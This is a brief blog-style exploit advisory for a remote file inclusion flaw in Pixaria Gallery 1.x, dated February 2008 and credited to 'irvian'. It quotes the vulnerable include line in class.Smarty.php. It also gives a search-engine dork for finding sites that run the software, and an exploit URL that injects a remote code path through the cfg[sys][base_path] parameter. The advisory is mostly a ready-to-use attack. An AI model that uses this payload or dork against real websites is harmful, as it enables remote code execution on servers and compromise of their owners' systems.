Pixaria Gallery v1.x.x (class.Smarty.php) Remote File Include Vulnerability
---------------------------------------------
# scripts : Pixaria Gallery v1.x.x
# Discovered By : irvian
# scripts site : http://pixaria.com
# dork : inurl:index.gallery.php?gid=
----------------------------------------------
bug found:
/resources/includes/class.Smarty.php
// Load the main Smarty class
require_once ($cfg['sys']['base_path'] . "resources/smarty/libs/Smarty.class.php");
Exploit:
/resources/includes/class.Smarty.php?cfg[sys][base_path]=[evilcode]
IP Address
26 February 2008
Pixaria Gallery 1.x RFI
Subscribe to:
Post Comments (Atom)
0 komentar:
Post a Comment